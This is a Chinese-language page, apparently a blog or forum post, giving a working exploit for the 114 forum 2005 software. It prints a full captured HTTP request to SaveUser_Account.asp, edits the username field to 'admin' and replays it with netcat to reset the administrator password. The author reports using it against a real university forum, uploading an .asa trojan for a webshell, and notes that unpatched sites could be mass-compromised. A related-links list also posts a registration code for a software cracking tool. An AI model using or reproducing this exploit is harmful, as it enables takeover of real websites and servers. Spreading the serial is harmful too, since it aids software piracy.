114论坛2005正式版漏洞

关键字:

"版权所有 设计制作:网站114"

漏洞描述:

网站114论坛 2005版正式

/edituserdb.asp

对提交数据和cooikes缺乏验证

导致任意用户可以修改管理员密码

默认后台admin/index.asp

今天在旁注一个机房的机器时用了一下。

http://www.***.net.cn/xzl/BBS/index.asp

**医科大学网站上的一个论坛。

注册了一个用户33221.

然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包!

用记事本保存抓包内容如下:

-----------------------------------------------------------------------------------------------------------

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

Host: www.***.net.cn

Content-Length: 2304

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserCode"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtConfirmPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtQuestion"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAnswer"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserName"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="selSex"

先生

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtNick"

11

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtProvince"

111

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtfile"; filename=""

Content-Type: application/octet-stream

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="submit"

修改注册信息

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------

其中:“

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserCode"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtConfirmPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtQuestion"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAnswer"

33221

-----------------------------7d61e41d605f6

修改第一个"33221"为“admin”保存11.txt文本为:

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

Host: www.***.net.cn

Content-Length: 2304

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserCode"

admin

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtConfirmPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtQuestion"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAnswer"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserName"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="selSex"

先生

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtNick"

11

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtProvince"

111

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtfile"; filename=""

Content-Type: application/octet-stream

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="submit"

修改注册信息

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

这里因为我注册的用户名33221与admin长度一至,所以这里不用修改字节长度。

然后用nc提交到服务器

nc www.***.net.cn 80 <11.txt

返回提示修改会员资料成功。

然后用admin 密码为申请33221的密码一至登录。

当然就是管理员权限了,然后登录后台,点击“修改栏目”,上传asa木马,ok,拿到webshll。

看了一下,这个论坛系统还没有出补丁,可以拿大批webshell了,不过我只要了对我比较有用的一个服务器,其它的没有去抓了。

(0)

相关推荐

  • 114论坛2005正式版漏洞

    关键字: "版权所有 设计制作:网站114" 漏洞描述: 网站114论坛 2005版正式 /edituserdb.asp 对提交数据和cooikes缺乏验证 导致任意用户可以修改管理员密码 默认后台admin/index.asp 今天在旁注一个机房的机器时用了一下. http://www.***.net.cn/xzl/BBS/index.asp **医科大学网站上的一个论坛. 注册了一个用户33221. 然后跳转到 /edituserdb.asp,单击"修改注册"开

  • 360安全卫士 3.0 正式版下载

    360安全卫士 3.0 正式版下载

    360安全卫士是一款安全类上网辅助软件,它拥有查杀恶意软件,插件管理,病毒查杀,诊断及修复四大强劲功能,同时还提供弹出插件免疫,清理使用痕迹以及系统还原等特定辅助功能.360安全卫士适用于windows2k/xp系统,IE5.0以上浏览器.360安全卫士是由奇虎网推出的一款全免费产品.2007-1-31 360安全卫士v3.0正式版发布·主动防御阻止恶意程序安装,保护系统关键位置拦截恶意钓鱼网站,防止帐号.QQ号.密码丢失·超强查杀"破冰"技术,独家清除cnnic中文上网等顽固型恶意软

  • Windows 2003 64位正式版抢先体验

    Windows 2003 64位正式版抢先体验

    经过长时间的测试Windows Server 2003正式版终于要和大家见面了,因为我是Windows Server "R2"的测试员所以率先下载到了正式版本的Windows Server 2003 SP1版,打上了微软即将推出"R2"功能包.下面先让大家看看Windows Server 2003 R2 Enterprise x64 Edition的下载页面吧. Windows Server 2003 R2 Enterprise x64 Edition的下载页面 顺

  • 20070910更新的火车采集器3.2正式版发布下载

    火车头团队一直致力于为广大网站站点提供数据信息和实用的工具软件, 开发团队秉承"专业,专注,沉着,创新"的理念,用实力铸造精品. 经过2007年3月至2007年9月,近5个多个月的研发及几个版本的内部测试,一个具有全新内核和架构的强大信息采集,数据加工软件--火车采集器3.2版 呈献在大家面前,为始终支持和关爱火车软件发展的站长们献上一份谢礼. 火车采集器1.X-3.X一直免费使用并深受广大站长欢迎,通过大家对3.2测试版的反馈,无论在性能,功能和稳定性上面3.2都是以前版本无法比拟的

  • Web前端框架Angular4.0.0 正式版发布

    前言 angular4.0.0正式版现在可以使用了.这是自我们宣布angular改版后,首次发布的专业版本.它向下兼容,支持所有使用了angular2.x.x版本的应用程序. 我们很高兴和大家分享这个版本,它包括最近的3个月中我们做的功能上的主要改进.我们努力让开发者们能够很容易的接受angular4.0.0. 新版本的特性 •更轻量化.更快 在这个新版本上,我们履行了我们的承诺,我们做到了让Angular的程序变的更轻量化,更快.但是我们还没有完全的优化完,在接下来的日子中,你会看到我们将着重

  • vmware 12 安装 mac os 10.12正式版的教程

    1.首先下载安装vmware 12 pro ,将VT打开(虚拟功能,以前安装过虚拟机点的同学可忽略). 2.下载mac ox 10.12正式版镜像文件(cdr后缀). 3.下载Unlocker208(vmware12安装mac os的补丁). 开始安装: ① 安装好vmware 12 pro 后,关闭vmware,并打开任务管理器,将服务标签下的vmware服务都关掉. 将下载好的unlocker208解压到全英文路径,右键以管理员身份运行win-install.cmd 注意:运行win-ins

  • Angular发布1.5正式版,专注于向Angular 2的过渡

    Angular团队最近发布了Angular 1.5的正式版,该版本实现了一次重大的升级,它让仍在使用1.X版本的开发者将能够更容易地过渡到Angular 2的开发. Pete Bacon Darwin在此次发布 声明 的博客文章中写道,这次发布的目的是"改进Angular 2的升级路径.我们在这次发布中引入了一些新的特性,让开发者编写的Angular 1应用更接近于在Angular 2中应用的结构." 此次发布中,新的module.component()辅助方法是向Angular 2进

  • VB6反编译软件VB RezQV2.4a 正式版注册码

    VB6反编译软件VB RezQV2.4a 正式版 (下载该软件)软件说明:VB6反编译软件VB RezQV2.4a 正式版注册码:name: Ardith Freebairncode: 680F-69EA-7154-0CA3 发布者:Regkey.cn发布时间:2006-2-1 12:02:45发布IP:202.96.134.128

  • Docker v1.13.0 正式版发布

    Docker v1.13.0 正式版发布了. 重要信息:在 Docker 1.13 中,与在 Docker 1.12 中引入的实验版本相比,管理插件 api 发生了变化.在升级到 Docker 1.13 之前,必须卸载使用 Docker 1.12 安装的插件.可通过  docker plugin rm 命令卸载插件. 如果已经升级到 Docker 1.13 而不卸载先前安装的插件,则当 Docker 守护程序启动时,可能会看到此消息 Error starting daemon: json: ca

  • 在IIS上安装PHP4.0正式版

    本文是在Windows 2000简体中文正式版(IIS5.0)的环境下写出来的,在Windows NT 4.0的IIS4.0上应该也适合,有任何问题烦请告诉本人,在此谢谢各位,^_^ 1.软件下载:       http://www.php.net/distributions/php-4.0.0-Win32.zip2.用WinZIP等解压缩工具把php-4.0.0-Win32.zip解开到PHP安装目录,如C:\PHP,本文中用$PHP_ROOT来代替PHP安装目录:3.详细的英文安装文档请参考

随机推荐